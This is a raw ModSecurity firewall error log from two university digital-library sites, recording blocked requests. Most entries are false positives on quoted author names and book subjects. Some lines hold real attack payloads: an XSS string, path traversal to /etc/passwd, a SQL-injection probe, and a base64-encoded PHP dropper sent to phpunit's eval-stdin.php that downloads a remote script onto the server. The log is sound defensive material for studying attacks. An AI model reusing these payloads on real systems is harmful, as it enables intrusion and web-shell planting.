"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArbWbgAAAAG"]
[Tue Aug 29 11:57:31.659195 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArLLlYAAAAb"]
[Tue Aug 29 11:57:32.612648 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAocyucAAAAR"]
[Tue Aug 29 11:57:33.609200 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAriwiYAAAAK"]
[Tue Aug 29 12:26:41.027662 2023] [:error] [pid 3458] [client 47.128.27.161] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AYYUB, HASAN SYEKH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2BkcCo-f0AAA2CKfUAAAAE"]
[Tue Aug 29 12:59:41.895696 2023] [:error] [pid 4103] [client 47.128.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22UMAR,HUSEIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2JTcCo-f0AABAHlxsAAAAd"]
[Tue Aug 29 14:14:00.782487 2023] [:error] [pid 5713] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KAMUS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2auMCo-f0AABZRckkAAAAa"]
[Tue Aug 29 15:01:33.174779 2023] [:error] [pid 6920] [client 188.26.204.136] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ENSIKLOPEDIA KOMUNIKASI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2l3MCo-f0AABsIQ94AAAAE"]
[Tue Aug 29 15:01:33.805047 2023] [:error] [pid 6804] [client 188.26.204.136] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ENSIKLOPEDIA KOMUNIKASI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2l3cCo-f0AABqUGgAAAAAC"]
[Tue Aug 29 15:21:50.117740 2023] [:error] [pid 7217] [client 40.77.167.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SNYDER JAMES C\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2qnsCo-f0AABwxQOYAAAAi"]
[Tue Aug 29 15:21:50.772493 2023] [:error] [pid 7217] [client 40.77.167.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ed. LINDSEY, TIM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2qnsCo-f0AABwxQOcAAAAi"]
[Tue Aug 29 16:16:13.195853 2023] [:error] [pid 8496] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BUKU AKTIVITAS ANAK CERDAS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO23XcCo-f0AACEwdzQAAAAY"]
[Tue Aug 29 16:17:18.982192 2023] [:error] [pid 8561] [client 47.128.22.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SINIWOKO, ENDRO DEWANTORO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO23nsCo-f0AACFxLGYAAAAS"]
[Tue Aug 29 16:24:36.654973 2023] [:error] [pid 8660] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ARMANDO, ROCHIM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO25VMCo-f0AACHUs24AAAAO"]
[Mon Aug 28 08:38:58.657739 2023] [:error] [pid 38503] [client 47.128.27.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MICHAEL G. ROSKIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv6ssCo-f0AAJZnSm0AAAAB"]
[Mon Aug 28 10:57:35.804753 2023] [:error] [pid 40829] [client 47.128.29.230] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/Management_Development_cover_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfisip.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwbL8Co-f0AAJ99kFUAAAAM"]
[Mon Aug 28 14:33:20.490380 2023] [:error] [pid 45113] [client 47.128.26.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22JACK RABIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxNwMCo-f0AALA5NekAAAAE"]
[Mon Aug 28 15:04:11.868190 2023] [:error] [pid 45635] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22RUDY, T. MAY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxU@8Co-f0AALJDTZUAAAAE"]
[Mon Aug 28 17:30:01.400895 2023] [:error] [pid 48490] [client 47.128.19.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Peter P.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx3KcCo-f0AAL1qxZwAAAAK"]
[Mon Aug 28 18:10:38.842480 2023] [:error] [pid 49256] [client 47.128.29.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PENGANTAR ILMU POLITIK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyArsCo-f0AAMBoytgAAAAP"]
[Mon Aug 28 18:24:44.434851 2023] [:error] [pid 49510] [client 47.128.17.220] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DASAR-DASAR ILMU POLITIK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyD-MCo-f0AAMFmmgQAAAAV"]
[Mon Aug 28 19:09:22.173130 2023] [:error] [pid 50179] [client 47.128.31.254] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AGUSTINO, LEO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyOcsCo-f0AAMQDr2YAAAAA"]
[Mon Aug 28 20:12:34.765129 2023] [:error] [pid 51389] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digilibfisip.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydQsCo-f0AAMi93woAAAAC"]
[Mon Aug 28 20:26:38.804621 2023] [:error] [pid 51666] [client 192.99.7.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Julie McCarthy with Karla Galv\\xc3\\xa3o\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOygjsCo-f0AAMnSH30AAAAN"]
[Tue Aug 29 00:01:13.582636 2023] [:error] [pid 56103] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ANWAR SHAH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzS2cCo-f0AANsnljMAAAAV"]
[Tue Aug 29 00:22:59.411283 2023] [:error] [pid 56491] [client 104.200.131.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  (<'\\x22> found within ARGS:p: show_detail'nvOpzp; AND 1=1 OR (<'\\x22>iKO)),"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzX88Co-f0AANyr2iUAAAAS"]
[Tue Aug 29 03:08:33.794423 2023] [:error] [pid 58263] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22GUIDO B\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz@wcCo-f0AAOOXznIAAAAJ"]
[Tue Aug 29 03:40:11.008482 2023] [:error] [pid 58591] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22David Craig and Doug Porter\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0GK8Co-f0AAOTfHdAAAAAB"]
[Tue Aug 29 05:57:23.379411 2023] [:error] [pid 60286] [client 47.128.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22POLITIK EDITORIAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfisip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0mU8Co-f0AAOt@nmAAAAAG"]
